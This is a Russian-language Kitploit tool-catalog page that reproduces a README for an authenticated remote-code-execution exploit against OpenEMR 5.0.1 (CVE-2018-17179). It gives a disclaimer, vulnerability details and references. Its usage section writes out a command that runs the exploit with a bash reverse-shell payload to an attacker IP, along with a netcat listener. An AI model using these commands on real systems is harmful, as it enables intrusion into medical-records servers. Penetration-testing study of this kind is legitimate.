Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-17179-OpenEMR — Эксплойт для аутентифицированного удаленного выполнения кода для OpenEMR 5.0.1 (CVE-2018-17179) с настраиваемыми полезными нагрузками команд и поддержкой reverse shell для образовательного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/cyberquestor-infosec/cve-2018-17179-openemr
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubcyberquestor-infosec/cve-2018-17179-openemr

CVE-2018-17179-OpenEMR

Эксплойт для аутентифицированного удаленного выполнения кода для OpenEMR 5.0.1 (CVE-2018-17179) с настраиваемыми полезными нагрузками команд и поддержкой reverse shell для образовательного тестирования на проникновение.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 год назадЕщё не проверено

CVE-2018-17179-OpenEMR

⚠️ Отказ от ответственности
Этот репозиторий предназначен строго для образовательных и исследовательских целей.
Предоставленная информация и код могут использоваться только в контролируемых средах, например, на частных лабораторных машинах.

Несанкционированное использование этого кода против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.


🔍 Об уязвимости

CVE-2018-17179 затрагивает OpenEMR — широко используемое программное обеспечение с открытым исходным кодом для ведения электронных медицинских записей и управления практикой.
Ошибка в механизме аутентификации конечной точки rest_routes.php позволяет аутентифицированному пользователю выполнять произвольные команды на сервере.

Это может привести к удаленному выполнению кода (RCE) в контексте пользователя веб-сервера.

  • Тип уязвимости: Аутентифицированное удаленное выполнение кода
  • Затрагиваемый компонент: interface/main/main_screen.php через rest_routes.php
  • Требуется аутентификация: ✅ Да
  • Серьезность: Критическая
  • Оценка CVSS: 9.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

🧾 Ссылки

  • Exploit-DB Entry – 45161
  • OpenEMR GitHub Repository
  • CVE Details – CVE-2018-17179
  • NVD CVE Report

🛠 Обзор эксплойта

Этот репозиторий содержит модифицированную версию публичного эксплойта с Exploit-DB:

  • Название эксплойта: OpenEMR 5.0.1 – Authenticated RCE
  • ID ExploitDB: 45161
  • Язык: Python 2
  • Требуется аутентификация: Да

В этой модифицированной версии:

  • Вы можете напрямую указать свою полезную нагрузку с командой (например, обратную оболочку).
  • Эксплойт поддерживает чистый запуск из командной строки для гибкости.
  • Чувствительные поля, такие как генерация куки сессии и логика внедрения команды, сохранены из оригинала.

💥 Демонстрация

🔐 Страница входа

Целевая тестовая панель входа OpenEMR локально:

Login Page


📂 Использование эксплойта

Использование: python2 exploit.py <target_url> -u -p -c

Пример: python2 exploit.py http:///openemr -u admin -p secretpass -c 'id'

root@kitploit:~

- Убедитесь, что у вас установлен Python 2.
- Пользователь должен иметь доступ к уязвимой конечной точке `rest_routes.php`.

Запуск эксплойта

Запустил модифицированный скрипт эксплойта с полезной нагрузкой в виде bash-обратной оболочки:

root@kitploit:~
python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'

Exploit Output

Шаг 3 – Получение обратной оболочки

Слушатель Netcat на порту 4444 успешно получил обратную оболочку:

root@kitploit:~
nc -nvlp 4444

Exploit Output

📖 Блог на Medium

Ознакомьтесь с подробным руководством и теорией в моей статье на Medium:
👉 Читать блог на Medium

Скачать инструмент